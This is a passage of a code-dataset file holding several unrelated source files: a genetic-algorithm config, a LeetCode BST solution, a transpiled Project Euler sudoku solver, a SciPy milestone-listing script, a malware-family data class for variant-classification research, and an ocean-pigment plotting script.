deepcopy(basic_politics)\nbasic_dfs_greedy_politics[\"normal\"][\"heuristic_politics\"] = heuristic_politics[\n [\"DFS\", \"NearestCity\"]\n]\n\np1 = deepcopy(basic_politics)\np1[\"normal\"][\"selection_politics\"] = selection_politics[[\"tournament\", \"wheel\"]]\n\np2 = deepcopy(basic_politics)\np2[\"normal\"][\"selection_politics\"] = selection_politics[[\"wheel\"]]\n\np3 = deepcopy(basic_greedy_politics)\np3[\"normal\"][\"selection_politics\"] = selection_politics[[\"tournament\", \"wheel\"]]\n\np4 = deepcopy(basic_greedy_politics)\np4[\"normal\"][\"selection_politics\"] = selection_politics[[\"wheel\"]]\n\nMA = deepcopy(basic_politics)\nMA[\"stuck\"][\"mutation_politics\"] = mutation_politics[\"opt\"]\n\ngenetic_politics = {\n \"Basic\": basic_politics,\n \"Greedy\": basic_greedy_politics,\n \"DFS\": basic_dfs_politics,\n \"DFS, Greedy\": basic_dfs_greedy_politics,\n \"Monte_Wheel\": p2,\n \"Monte_WheelTournament\": p1,\n \"Monte_Tournament\": basic_politics,\n \"Greedy_Wheel\": p4,\n \"Greedy_WheelTournament\": p3,\n \"Greedy_Tournament\": basic_greedy_politics,\n \"MA\": MA,\n}\n","sub_path":"algorithms/genetic_politics/genetic_politics.py","file_name":"genetic_politics.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"148205294","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def bstFromPreorder(self, preorder):\n \"\"\"\n :type preorder: List[int]\n :rtype: TreeNode\n \"\"\"\n if not preorder: return None\n if len(preorder)==1: return TreeNode(preorder[0])\n left, right = 1000, 1000\n for i, num in enumerate(preorder):\n if num < preorder[0]:\n left = i\n break\n for i, num in enumerate(preorder):\n if num > preorder[0]:\n right = i\n break\n root = TreeNode(preorder[0])\n root.left = 
self.bstFromPreorder(preorder[left:right])\n root.right = self.bstFromPreorder(preorder[right:])\n return root\n","sub_path":"Leetcode/dfs_recursion_backtracking/1008_ConstructBinarySearchTreeFromPreorderTraversal/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"307426966","text":"#!/usr/bin/env python2\n\n# transpiled with BefunCompile v1.3.0 (c) 2017\nimport sys\nimport zlib, base64\n_g = (\"AR+LCAAAAAAABADNWslu40gS/ZVUS7qQ0Cj3ZBIEMUBfZ4A++mDQfeM1Tzz54ye2pKjFLrvs6prsLklcRMXji3ix0It6elLqSe0vS725cb+UrA+d9Ghp7bTVUWujdbaa\"\n + \"l7HBw4FotA0Zti2epbMOWsN+PJtXRxsdHtR4HE/N2tNlkvoTr//nDZj1h6827tf+7sN7Jz1aGY0Gi02wHtGRwb4anhkyWp1W6zv6P8EBOM/jEQsXCHA/HH5RLqLVX7hu\"\n + \"afrnkIElnY6+sgBmwi3v6KPsDCkja7Av4Hm2HmMi8WPAN/psIl8jwi5wxif6+d+GrDPoQprsw8/VtwJ7m09Agu/IWHZV2O+SZwIBiTOJqOvWu9PRMfUfWr8NWdpYIyuC\"\n + \"WZadKhLMSK4ItDGbgY+5SjJ/efVWCy8evqP++i+sj3H2QDi+jAzsTmgyGGMTmRaM4GP1IMiOeU3MrBaGnTVIoI2iHogqkBOjyyqAhdB+hOyx4n0HMjAMPe+ieEyIz6kG\"\n + \"WocHg9CSSWEMnR+YNAq9bCpgwxxrjLOnW9X/55B1miMrM57smZRk+c6jvMgRXV0wEoIODwMGJMngweRd1jVvwImp/vy7yO5x8ZnfwRmGTY0ZpsLYzGEXfAKXy3jYEh+R\"\n + \"wdlNWCLmKEKaavgFIPL7kd2E4g+QWQolNMc75AHNx7yUAhPDvhYk9IDLsEkR3XqSdhsJShSdzUNkl7UM+4e4boze31/mQ3wqMhdDZw0zjpfIBBnyU5YWWzMcAbV4Xk6a\"\n + \"d+MeeEudEAuaM/KPL2/88H5YPoPs/ZMeIqMKxEoYGQw01m9PtUUtprBKobID6Y1Um3S0xYGFVUuWVLhqIy8C6LNtWmNK7ps+N9GU0ZyW/T2yDfDrD4/x/yDOwEAA0OUK\"\n + \"h4TOS4pCY0FFvLmoPac0egMVjPh1RLNKv5WLIKrcPuezaUuvn/t8NGau269s2GNU34ZsXZGLjrrFqYmLi1r1olTa7Xc2QLG0htOZ1w6RTcfcP7dNF49t16m5Nef83GbY\"\n + \"2R/2/fAzyNTHkVGCjuyJlrUOEhgXgdpx6Uss2o6TFRcdWQQF/kPQRhxYTo6Y1xdzbrIDYCkc4UP/rPuTGWYTC8TocM/Zd3sjWQVlMNYh4nFSN3KSirCbCn1Ja/gxayn+\"\n + \"oT8IcjJjDiuNSY/shC43xy437TN8OO9fldn37V6Vvbrl7A1x+GlkiQqrTQGC4ibJSULHYUVyIVVTgsBkp6UQQWJ9FlXsolzlVhQLXOYwjAX6pdJD1C2fymfvw3+0EJdh\"\n + \"8z0SAZ+Bo85ZUT8EZcXF8MUZLC/9NlObzX3B5tXyuSMIIUhgn88OoOSjtcUaOy013IbPZepHTvsBBQFIZGwE6Xa34lBFJawHSGvQ96zmQpJ2miDvyDfGGYjIAQNq3Pze\"\n + \"MsauOfXels9xtgG32fEDZNBqGrTJkomGIOSVEspvJnuHPCScGODJQcAZ21XvtaytQZAaD1efXqZ9f/V7Ysyw7IZfXuvzzY84NiChoAqxSj9KX67htlaLiXOxkxO4Aa3y\"\n + \"WNNDuf4hcsyj9QXdc5le1PKL+zMqnxAHlhGsEVaMB3uptHBShOCB5HTseIuEvxM5wQoYyxkZgqBfjk7PEGqn3X56gfdJAJJFyKdafnHnGeq9Rsq8qbMMMi5RgSG9ADgg\"\n + \"aHziuY+nvBzW2Fu9t7YEVqtFF/jCy7LfnSBZQ6KevTPwYnMZDgTnI0a/e9JbRSmsgUzhHEUaBw0nsMAfOU9zy2KZRxeo9a7aUoMPdngKPETomTi8/Cj/VA/EHYyf98sL\"\n + \"KA066vKtc5AriC+H3rSvGScenRYBkca5y1zkrxms+uKFFtlDZHmRHV0ndhSD050hBTAPG7u+jsyM7fNs3JzVMbf4TkUp/vIyYBqjeUeqsyhSdXS6zq8ZwII0IiyDIx+c\"\n + \"lBqqW7LQZjFIPfcCRm5CLhF/oAePbM3s/ZVJAzI5fR3ZaWqbputso/I5zDoe8wwO30CuPKhQiYg8Ija1m3aJUxPXujUWZXlqpCsSuYKzgblPdK4ffckkid6XkBrrZ9d4\"\n + \"eDm2yweM/hAyNfZRl5ypJOiNK/kc9RyOk/qXogpYrObxdbykaoyqvAVVFZ11RXbX/Bz0Wn5BYZIM/vT42oOEzG17dsBb40hElLjkG1n6RiTfPUlc/uLjz22LejX8W3EN\"\n + \"FfRmfC0x013x5NjJZORqJCtYm4TirIVibYLUJfRLIIJj9LNpo98kuOl1AtTvivZH1n7oU+K88pzNjNVNCG0TAjqFTAmM3YyvQ0xcAfNAJ7h8mZeG+lwjM/4so2UpYdyl\"\n + \"uCYEV4Zc7uxhWG5x7Qf1aI3Q2EMtDf98oJYc7C5SkSpoZiNmfhtLNnFeFuILbiNeS8q/Tm/H1zJBhHdMvV11VRxzE780LHY8LM78WCAIr4l4S7pOC5Cwfgdib05wZw2y\"\n + \"Z3xZ9qMavcW73Fo759apN1LT6m6Lwsw4B5KiA1Rtu36APQNhaedoAc9IjEVQrImqKx5xbx62OM96T20bpWQw3zieY9HDG2kyLc93HLcv1Y3ludQmyRyAI4iwAiA8Vvxm\"\n + \"gGJyycAFGKFdgVc7XPNbLGidhXu/aNu3Rs0KtpY5hsMLlgDQ8Be4oYOazMUlrlmnZJT1Ku9r++mpCEE5MVFIxE6aehqTKQni9B7bg2D0is1XfNcyr0ZoZYInYCBey4kL\"\n + \"SVCzP57+QOG0IJyQkEA4IS/VDbw10NABbhWghll2eKUdfLPtY0S9BRd0TQT/O7njLelWmuJuM75mAmn+qOkpGYt/cNQXpDoaYL0gKbGyXVM5VVfjqEmLU7GpuITRsbwc\"\n + 
\"VAYTLN7phSXTGZBMC5LZHuuGbXJX4CD4IDCsSzsDMmeGMELvA55Z5fYEqhHhC+iK7W2cchnMj71kfN3xNNxuA66KJA9epcmGLkwEyK1PYyKXjeDQaHv2JcVz7ksKx4xj\"\n + \"kKkf0BMLuupLsHOXN3Q9CLURnBJaVoecLSpE1asT7g6oEyEW/1Z8ArJOCth1fJ3piRmHjdl0zzePknR9HFqrYccPCV3twcmupg0JmugILzO4IVj1WnqsJaf+tS83nN2r\"\n + \"4wTx5kE1irLKDWr2aszTa7v7ew5I1243x82Xrvsm1EXITqTy8tSCqdlUHI4DrUO9N4kUJ5AO0hdkTFefkzp9QUZrYfFKEer8FPKQZCw+HjKGml1DzWGNYilmarDx5kpL\"\n + \"mACOGkb1cE3hapNYcOuQ27ASuDX6pOPCp/E1CvnBdQrOXwQD9/ko7JmN6gOCE0QaMGeTKsCdmwQZ5rOlhov1l2Crm+4SbvVScf5712L2iDOkOQv6EYqPM6Q6cM9wra6s\"\n + \"0ThL5B6MHS4RE8HgfOR6cEpPlnJ9ym6xPTCoIGsTLpwSsgVNg0DDcWORsSMEG7QZahknoKKG2oauBSLnvjqZ3kjk7yxpqbs6K8QMYPD2J/oDCDQ7dPLYzLK/8fMLmZk4\"\n + \"yNqRAhM6BtITPkzF1XgdZCTakLT7aYC4gWpWQu2Ks08jeGt5eRrmSOZtvFS1l+Ulm3OJZeodSFcnJfnLEMnTlM+WFBqox8oaZcAhdmh9r/RiMk4fN+msxphqlXEXFs9t\"\n + \"+07r/PYyUQbythqouTgG6jxNSbPjp7PUoOZLh8lQTQYSKSzBL+nJk5FqBK8+ImFg27z+Hlatu1el5vHUOzddB5qjQFNOrSxSqKmf4tHxg/dYRdzRX0DQKAcYhIwVNuWk\"\n + \"MzejR2LZo1LWQUhg94Y2Bq8+oayjIC7A2VnRZ+wx4I5CWQSJeJvT1kD7nsUPAWmQweOAWqpT6BiedOBso7tAomiK3ti1RiRSU2cq7/L8bJQoK9NI1BWn0XhdJsq3r/2g\"\n + \"yh1n3xVoYCICEC+L3W1fRiGViEvjsZF2VAlTEsie70mucNc/TcL0DxdfCiTUZDDOcGqVbNtY+FLRlhxMMlrvjpDU3NlJZlONQg7PDjWzvc1xsNvV3d9F72fXdKve+2Gp\"\n + \"o/BJYYO2hwL/KtJaoK2BODvfJrcWs5s7b2pKOPJz8ff1dT+7UrWxmq2hgT8A7TeRJiwBsu+OuV++ppVEoA+Q09S/vMPZbyLlS2t6cwoC1cZDuv9/1v8AqAXMMpQqAAA=\")\ng = base64.b64decode(_g)[1:]\nfor i in range(ord(base64.b64decode(_g)[0])):\n g = zlib.decompress(g, 16+zlib.MAX_WBITS)\ng=list(map(ord, g))\ndef gr(x,y):\n if(x>=0 and y>=0 and x<218 and y<50):\n return g[y*218 + x];\n return 0;\ndef gw(x,y,v):\n if(x>=0 and y>=0 and x<218 and y<50):\n g[y*218 + x]=v;\ndef td(a,b):\n return ((0)if(b==0)else(a//b))\ndef tm(a,b):\n return ((0)if(b==0)else(a%b))\ns=[]\ndef sp():\n global s\n if (len(s) == 0):\n return 0\n return s.pop()\ndef sa(v):\n global s\n s.append(v)\ndef sr():\n global s\n if (len(s) == 0):\n return 0\n return s[-1]\ndef _0():\n sa(0)\n sa(49)\n sa(1)\n return 1\ndef _1():\n return (3)if(sp()!=0)else(2)\ndef _2():\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()+((((gr(9,1)-48)*10)+(gr(10,1)-48))*10)+(gr(11,1)-48))\n\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n return 3\ndef _3():\n sa(sr());\n gw(6,0,sp())\n gw(1,3,80)\n gw((gr(1,3)%9)+9,(gr(1,3)/9)+1,gr((gr(1,3)%9)+((gr(6,0)/5)*9)+128,8+((gr(6,0)%5)*9)))\n sa(80)\n sa(80)\n return 4\ndef _4():\n return (94)if(sp()!=0)else(5)\ndef _5():\n sp();\n\n return (7)if(sr()!=-1)else(6)\ndef _6():\n sp();\n sys.stdout.write(str(sp())+\" \")\n sys.stdout.flush()\n return 95\ndef _7():\n gw(1,1,22)\n gw(6,1,729)\n gw(17,9,(gr(17,9)%16)+48)\n gw(8+gr(1,1),9,0)\n sa(sp()-1)\n\n sa(80)\n sa(80)\n return 8\ndef _8():\n return (93)if(sp()!=0)else(9)\ndef _9():\n gw(2,0,1)\n sp();\n sa(gr(6,1)-1)\n sa(0)\n sa(((gr(6,1)-1)%27)+72)\n sa(((gr(6,1)-1)/27)+1)\n gw(((gr(6,1)-1)%27)+35,((gr(6,1)-1)/27)+1,0)\n return 10\ndef _10():\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n\n return (92)if(sp()!=0)else(11)\ndef _11():\n gw(3,0,0)\n gw(3,2,8)\n gw(2,2,8)\n gw(1,2,2)\n gw(5,2,1)\n sp();\n sa(80)\n sa(gr(17,9)-48)\n gw(4,2,gr(17,9)-48)\n return 12\ndef _12():\n return (28)if(sp()!=0)else(13)\ndef _13():\n sa(sr());\n\n return (91)if(sp()!=0)else(14)\ndef _14():\n gw(1,4,0)\n sp();\n return 15\ndef _15():\n return (16)if(gr(3,0)!=81)else(90)\ndef _16():\n gw(2,4,8)\n gw(3,4,8)\n sa(80)\n return 17\ndef _17():\n return (18)if(gr(9+gr(2,4),1+gr(3,4))!=48)else(80)\ndef _18():\n sa(sr());\n\n return (79)if(sp()!=0)else(19)\ndef _19():\n sp();\n\n return 
(20)if((gr(1,4))!=0)else(21)\ndef _20():\n gw(1,4,0)\n return 15\ndef _21():\n gw(1,5,0)\n return 22\ndef _22():\n gw(2,5,0)\n gw(3,5,0)\n gw(4,5,0)\n gw(5,5,6561)\n gw(1,6,8)\n gw(2,6,8)\n sa(80)\n return 23\ndef _23():\n sa(gr(9+gr(1,6),1+gr(2,6))-48)\n return 24\ndef _24():\n return (25)if(sp()!=0)else(70)\ndef _25():\n sa(sr());\n\n return (69)if(sp()!=0)else(26)\ndef _26():\n sp();\n\n return (27)if((gr(4,5))!=0)else(55)\ndef _27():\n global t0\n t0=gr(2,0)+1\n gw(2,0,gr(2,0)+1)\n gw(gr(1,1)+gr(2,5),1+gr(3,5),t0)\n gw(1,2,0)\n gw(2,2,gr(2,5))\n gw(3,2,gr(3,5))\n gw(4,2,gr(4,5))\n gw(5,2,gr(2,0))\n return 28\ndef _28():\n gw(gr(2,2)+9,gr(3,2)+1,gr(4,2)+48)\n gw(3,0,gr(3,0)+1)\n gw(1,3,8)\n sa(8)\n return 29\ndef _29():\n gw(35+(gr(2,2)*3)+(gr(1,3)%3),1+(gr(3,2)*3)+(gr(1,3)/3),88)\n\n return (30)if((gr(72+(gr(2,2)*3)+(gr(1,3)%3),1+(gr(3,2)*3)+(gr(1,3)/3)))!=0)else(54)\ndef _30():\n sa(sr());\n return 31\ndef _31():\n return (32)if(sp()!=0)else(33)\ndef _32():\n sa(sp()-1)\n\n sa(sr());\n gw(1,3,sp())\n return 29\ndef _33():\n gw(2,3,8)\n sp();\n sa(8)\n return 34\ndef _34():\n gw(35+(gr(2,3)*3)+((gr(4,2)-1)%3),1+(gr(3,2)*3)+((gr(4,2)-1)/3),88)\n\n return (35)if((gr(72+(gr(2,3)*3)+((gr(4,2)-1)%3),1+(gr(3,2)*3)+((gr(4,2)-1)/3)))!=0)else(53)\ndef _35():\n sa(sr());\n return 36\ndef _36():\n return (37)if(sp()!=0)else(38)\ndef _37():\n sa(sp()-1)\n\n sa(sr());\n gw(2,3,sp())\n return 34\ndef _38():\n gw(3,3,8)\n sp();\n sa(8)\n return 39\ndef _39():\n gw(35+(gr(2,2)*3)+((gr(4,2)-1)%3),1+(gr(3,3)*3)+((gr(4,2)-1)/3),88)\n\n return (40)if((gr(72+(gr(2,2)*3)+((gr(4,2)-1)%3),1+(gr(3,3)*3)+((gr(4,2)-1)/3)))!=0)else(52)\ndef _40():\n sa(sr());\n\n return (51)if(sp()!=0)else(41)\ndef _41():\n gw(2,3,2)\n gw(3,3,2)\n sp();\n sa(8)\n return 42\ndef _42():\n gw(35+((((gr(2,2)/3)*3)+gr(2,3))*3)+((gr(4,2)-1)%3),1+((((gr(3,2)/3)*3)+gr(3,3))*3)+((gr(4,2)-1)/3),88)\n\n return (43)if((gr(72+((((gr(2,2)/3)*3)+gr(2,3))*3)+((gr(4,2)-1)%3),1+((((gr(3,2)/3)*3)+gr(3,3))*3)+((gr(4,2)-1)/3)))!=0)else(50)\ndef _43():\n sa(sr());\n return 44\ndef _44():\n return (49)if(sp()!=0)else(45)\ndef _45():\n sp();\n sa(gr(1,2))\n\n return (46)if((gr(1,2))!=0)else(14)\ndef _46():\n sa(sp()-1)\n\n sa(sr());\n\n return (47)if(sp()!=0)else(48)\ndef _47():\n sp();\n return 13\ndef _48():\n sp();\n return 18\ndef _49():\n sa(sp()-1)\n\n sa(sr());\n gw(2,3,sr()%3)\n sa(sp()/3);\n\n gw(3,3,sp())\n return 42\ndef _50():\n gw(72+((((gr(2,2)/3)*3)+gr(2,3))*3)+((gr(4,2)-1)%3),1+((((gr(3,2)/3)*3)+gr(3,3))*3)+((gr(4,2)-1)/3),gr(5,2))\n sa(sr());\n return 44\ndef _51():\n sa(sp()-1)\n\n sa(sr());\n gw(3,3,sp())\n return 39\ndef _52():\n gw(72+(gr(2,2)*3)+((gr(4,2)-1)%3),1+(gr(3,3)*3)+((gr(4,2)-1)/3),gr(5,2))\n return 40\ndef _53():\n gw(72+(gr(2,3)*3)+((gr(4,2)-1)%3),1+(gr(3,2)*3)+((gr(4,2)-1)/3),gr(5,2))\n sa(sr());\n return 36\ndef _54():\n gw(72+(gr(2,2)*3)+(gr(1,3)%3),1+(gr(3,2)*3)+(gr(1,3)/3),gr(5,2))\n sa(sr());\n return 31\ndef _55():\n gw(1,7,-1)\n gw(2,7,-1)\n gw(3,7,-1)\n gw(5,7,8)\n gw(6,7,8)\n sa(80)\n return 56\ndef _56():\n return (57)if((gr(22+gr(5,7),1+gr(6,7))-gr(2,0))!=0)else(68)\ndef _57():\n sa(sr());\n\n return (67)if(sp()!=0)else(58)\ndef _58():\n gw(5,7,26)\n gw(6,7,26)\n sp();\n sa(728)\n return 59\ndef _59():\n return (66)if((gr(72+gr(5,7),1+gr(6,7))-gr(2,0))!=0)else(60)\ndef _60():\n gw(72+gr(5,7),1+gr(6,7),0)\n gw(35+gr(5,7),1+gr(6,7),0)\n\n return (65)if(gr(9+(gr(5,7)/3),1+(gr(6,7)/3))!=48)else(61)\ndef _61():\n sa(sr());\n return 62\ndef _62():\n return (64)if(sp()!=0)else(63)\ndef _63():\n gw(2,0,gr(2,0)-1)\n 
gw(22+gr(2,7),1+gr(3,7),0)\n gw(1,5,gr(1,7))\n sp();\n return 22\ndef _64():\n sa(sp()-1)\n\n gw(5,7,sr()%27)\n gw(6,7,sr()/27)\n return 59\ndef _65():\n gw(9+(gr(5,7)/3),1+(gr(6,7)/3),48)\n gw(3,0,gr(3,0)-1)\n sa(sr());\n return 62\ndef _66():\n sa(sr());\n return 62\ndef _67():\n sa(sp()-1)\n\n gw(5,7,sr()%9)\n gw(6,7,sr()/9)\n return 56\ndef _68():\n gw(1,7,gr(9+gr(5,7),1+gr(6,7))-48)\n gw(2,7,gr(5,7))\n gw(3,7,gr(6,7))\n return 57\ndef _69():\n sa(sp()-1)\n\n gw(1,6,sr()%9)\n gw(2,6,sr()/9)\n return 23\ndef _70():\n gw(4,6,0)\n gw(5,6,0)\n gw(6,6,1)\n sa(1)\n return 71\ndef _71():\n return (74)if((gr(35+(gr(1,6)*3)+((gr(6,6)-1)%3),1+(gr(2,6)*3)+((gr(6,6)-1)/3)))!=0)else(72)\ndef _72():\n gw(5,6,gr(5,6)+1)\n\n return (74)if((((1)if((gr(4,6))!=0)else(0))+((1)if(gr(6,6)<=gr(1,5))else(0)))!=0)else(73)\ndef _73():\n gw(4,6,gr(6,6))\n return 74\ndef _74():\n return (78)if(sr()!=9)else(75)\ndef _75():\n sp();\n\n return (76)if((((0)if((gr(5,6))!=0)else(1))+((1)if(gr(5,5)<=gr(5,6))else(0)))!=0)else(77)\ndef _76():\n sa(1)\n return 24\ndef _77():\n gw(2,5,gr(1,6))\n gw(3,5,gr(2,6))\n gw(4,5,gr(4,6))\n gw(5,5,gr(5,6))\n return 76\ndef _78():\n sa(sp()+1)\n\n sa(sr());\n gw(6,6,sp())\n return 71\ndef _79():\n sa(sp()-1)\n\n gw(2,4,sr()%9)\n gw(3,4,sr()/9)\n return 17\ndef _80():\n gw(5,4,0)\n gw(6,4,0)\n gw(4,4,8)\n sa(8)\n return 81\ndef _81():\n return (82)if((gr(35+(gr(2,4)*3)+(gr(4,4)%3),1+(gr(3,4)*3)+(gr(4,4)/3)))!=0)else(89)\ndef _82():\n sa(sr());\n return 83\ndef _83():\n return (88)if(sp()!=0)else(84)\ndef _84():\n global t0\n t0=gr(6,4)\n sp();\n\n return (85)if((gr(6,4))!=0)else(87)\ndef _85():\n global t0\n t0=t0-1\n\n return (18)if((t0)!=0)else(86)\ndef _86():\n gw(1,4,gr(1,4)+1)\n gw(1,2,1)\n gw(2,2,gr(2,4))\n gw(3,2,gr(3,4))\n gw(4,2,gr(5,4))\n gw(5,2,gr(2,0))\n return 28\ndef _87():\n sp();\n return 55\ndef _88():\n sa(sp()-1)\n\n sa(sr());\n gw(4,4,sp())\n return 81\ndef _89():\n gw(6,4,gr(6,4)+1)\n gw(5,4,gr(4,4)+1)\n sa(sr());\n return 83\ndef _90():\n sa((0)if(sr()-49!=0)else(1))\n return 1\ndef _91():\n sa(sp()-1)\n\n gw(3,2,sr()/9)\n gw(2,2,sr()%9)\n gw(1,2,2)\n gw(5,2,1)\n sa(sr());\n sa((sr()%9)+9)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n sa(gr(sp(),v0))\n sa(sp()-48)\n\n sa(sr());\n gw(4,2,sp())\n return 12\ndef _92():\n sa(sp()-1)\n\n sa(sr());\n sa(0)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%27)+35)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/27);\n\n sa(sp()+1)\n\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n sa(0)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%27)+72)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/27);\n\n sa(sp()+1)\n return 10\ndef _93():\n sa(sp()-1)\n\n sa(sr());\n sa(sr());\n sa((sr()%9)+9)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n sa(gr(sp(),v0))\n sa(sp()%16);\n\n sa(sp()+48)\n\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%9)+9)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n sa(0)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa((sr()%9)+gr(1,1))\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n sa(sp()/9);\n\n sa(sp()+1)\n\n v0=sp()\n v1=sp()\n gw(v1,v0,sp())\n sa(sr());\n return 8\ndef _94():\n global t0\n sa(sp()-1)\n\n sa(sr());\n sa(sr());\n gw(1,3,sp())\n sa(sp()/9);\n\n sa(sp()+((gr(6,0)%5)*9))\n\n sa((gr(1,3)%9)+((gr(6,0)/5)*9)+128)\n v0=sp()\n v1=sp()\n sa(v0)\n sa(v1)\n v0=sp()\n t0=gr(sp(),v0)\n gw((gr(1,3)%9)+9,(gr(1,3)/9)+1,t0)\n sa(sr());\n return 
4\nm=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21,_22,_23,_24,_25,_26,_27,_28,_29,_30,_31,_32,_33,_34,_35,_36,_37,_38,_39,_40,_41,_42,_43,_44,_45,_46,_47,_48,_49,_50,_51,_52,_53,_54,_55,_56,_57,_58,_59,_60,_61,_62,_63,_64,_65,_66,_67,_68,_69,_70,_71,_72,_73,_74,_75,_76,_77,_78,_79,_80,_81,_82,_83,_84,_85,_86,_87,_88,_89,_90,_91,_92,_93,_94]\nc=0\nwhile c<95:\n c=m[c]()\n","sub_path":"compiled/Python2/Euler_Problem-096.py","file_name":"Euler_Problem-096.py","file_ext":"py","file_size_in_byte":14781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"553532188","text":"def main():\n p = argparse.ArgumentParser(usage=__doc__.lstrip())\n p.add_argument('--project', default='scipy/scipy')\n p.add_argument('milestone')\n args = p.parse_args()\n getter = CachedGet('gh_cache.json')\n try:\n milestones = get_milestones(getter, args.project)\n if (args.milestone not in milestones):\n msg = 'Milestone {0} not available. Available milestones: {1}'\n msg = msg.format(args.milestone, ', '.join(sorted(milestones)))\n p.error(msg)\n issues = get_issues(getter, args.project, args.milestone)\n issues.sort()\n finally:\n getter.save()\n prs = [x for x in issues if ('/pull/' in x.url)]\n issues = [x for x in issues if (x not in prs)]\n\n def print_list(title, items):\n print()\n print(title)\n print(('-' * len(title)))\n print()\n for issue in items:\n msg = '- `#{0} <{1}>`__: {2}'\n title = re.sub('\\\\s+', ' ', issue.title.strip())\n if (len(title) > 60):\n remainder = re.sub('\\\\s.*$', '...', title[60:])\n if (len(remainder) > 20):\n remainder = (title[:80] + '...')\n else:\n title = (title[:60] + remainder)\n msg = msg.format(issue.id, issue.url, title)\n print(msg)\n print()\n msg = 'Issues closed for {0}'.format(args.milestone)\n print_list(msg, issues)\n msg = 'Pull requests for {0}'.format(args.milestone)\n print_list(msg, prs)\n return 0","sub_path":"Data Set/bug-fixing-5/398f9a750a163d54267a3574a5a2e99db567b506-
-bug.py","file_name":"398f9a750a163d54267a3574a5a2e99db567b506-
-bug.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419981932","text":"# マルウェアファミリのクラス\r\nclass family:\r\n def __init__(self):\r\n self.name = '' # ファミリ名\r\n self.samples = [] # 検体のリスト\r\n self.num = 0 # 検体数\r\n self.par_vec = [] # Paragraph Vectorのリスト\r\n self.sampling_count = 0 # サンプリングできる回数\r\n self.svm_data = [] # SVMに追加するデータリスト\r\n self.svm_label = [] # SVMに追加するデータリストの教師ラベル\r\n\r\n","sub_path":"MalwareVariantsClassification_YukiNakashima/program/Family.py","file_name":"Family.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"167203974","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jul 21 12:54:48 2019\r\n积分色素浓度画图 散点和分布图两种\r\n@author: Administrator\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport sys\r\nsys.path.append('D:/Refresh/py36')\r\nimport support_pie\r\nfrom matplotlib.colors import LogNorm\r\nimport matplotlib as mpl \r\n\r\ndef del_nan(value):\r\n arg_nan = np.where(np.isnan(value))\r\n arg = list(np.arange(len(value)))\r\n for i in range(len(arg_nan[0])):\r\n i = i+1\r\n x = arg_nan[0][-i]\r\n del arg[x]\r\n value = value[arg]\r\n return value,arg\r\n\r\n\r\ndef plot(pigment,df_plt,image):\r\n lon = np.array(df_plt.loc[:,'Longitude [degrees_east]'])\r\n lat = np.array(df_plt.loc[:,'Latitude [degrees_north]'])\r\n value = np.array(df_plt.loc[:,pigment])\r\n lon,lat,value = support_pie.inter_data(lon,lat,value,1000)\r\n# norm = LogNorm(vmin=np.min(value),\r\n# vmax=np.max(value)) \r\n norm = mpl.colors.Normalize(vmin=value.min(),\r\n vmax=value.max()*0.8)\r\n B = plt.contourf(lon,lat,value,25,cmap='rainbow',\r\n norm=norm,alpha=1)\r\n #colorbar \r\n plt.colorbar(B,format='%.1f') \r\n C = plt.contour(lon,lat,value,5,colors='white',linewidths=0.5,\r\n norm=norm)\r\n plt.clabel(C,inline=True,fontsize=12,colors='black',fmt='%.1f')\r\n #岛屿\r\n support_pie.contourf_re(image,lon_left,lon_right,lat_bottom,lat_top)\r\n\r\n \r\ndef plot_scatter(pigment,df_plt,image):\r\n# fig = plt.figure()\r\n support_pie.contourf(image,lon_left,lon_right,lat_bottom,lat_top)\r\n\r\n #station_index = np.array(df_plt['Station'])\r\n station_lon = np.array(df_plt.loc[:,'Longitude [degrees_east]'])\r\n station_lat = np.array(df_plt.loc[:,'Latitude [degrees_north]'])\r\n colors = np.array(df_plt.loc[:,pigment])/5\r\n\r\n norm = LogNorm(vmin=np.min(colors),\r\n vmax=np.max(colors))\r\n plt.scatter(station_lon,station_lat,\r\n c = colors,cmap='rainbow',s = 60,norm=norm) \r\n\r\n cb = plt.colorbar(format='%.1f')\r\n cb_ticks = cb.get_ticks()\r\n cb.set_ticks(cb_ticks[::2])\r\n#读取数据\r\ndf = pd.read_excel('D:/Refresh/data/CHINARE-35/水柱积分藻种数据.xlsx',\r\n sheet_name='Sheet1').set_index('Station')\r\n\r\n\r\nfontsize={'size':14,'weight':'normal'} \r\n\r\nlon_left,lon_right,lat_bottom,lat_top = 